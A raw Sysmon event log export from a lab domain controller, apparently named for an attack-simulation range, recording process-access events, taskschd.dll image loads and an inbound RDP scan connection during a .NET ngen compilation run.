10341000x800000000000000074053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.530{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.514{A7A01FEF-EBD2-607E-4B0C-00000000BB01}35645164C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.514{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4B0C-00000000BB01}3564C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.499{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.499{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-4A0C-00000000BB01}5840c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.499{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-480C-00000000BB01}5108c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.499{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-480C-00000000BB01}5108c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.483{A7A01FEF-EBD2-607E-480C-00000000BB01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 354300x800000000000000074043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.802{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52521-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.468{A7A01FEF-EBD2-607E-490C-00000000BB01}62207148C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-480C-00000000BB01}5108c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.468{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-490C-00000000BB01}6220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.468{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-480C-00000000BB01}5108c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.468{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-480C-00000000BB01}5108c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.452{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-460C-00000000BB01}4512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.452{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-460C-00000000BB01}4512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.452{A7A01FEF-EBD2-607E-460C-00000000BB01}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.436{A7A01FEF-EBD2-607E-470C-00000000BB01}60723932C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-460C-00000000BB01}4512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.421{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-470C-00000000BB01}6072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.421{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-460C-00000000BB01}4512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.421{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-460C-00000000BB01}4512c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-440C-00000000BB01}5796c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-440C-00000000BB01}5796c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.405{A7A01FEF-EBD2-607E-440C-00000000BB01}5796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.390{A7A01FEF-EBD2-607E-450C-00000000BB01}19805948C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-440C-00000000BB01}5796c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.374{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-450C-00000000BB01}1980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.374{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-440C-00000000BB01}5796c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.374{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-440C-00000000BB01}5796c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.358{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-420C-00000000BB01}5920c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.358{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-420C-00000000BB01}5920c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.358{A7A01FEF-EBD2-607E-420C-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 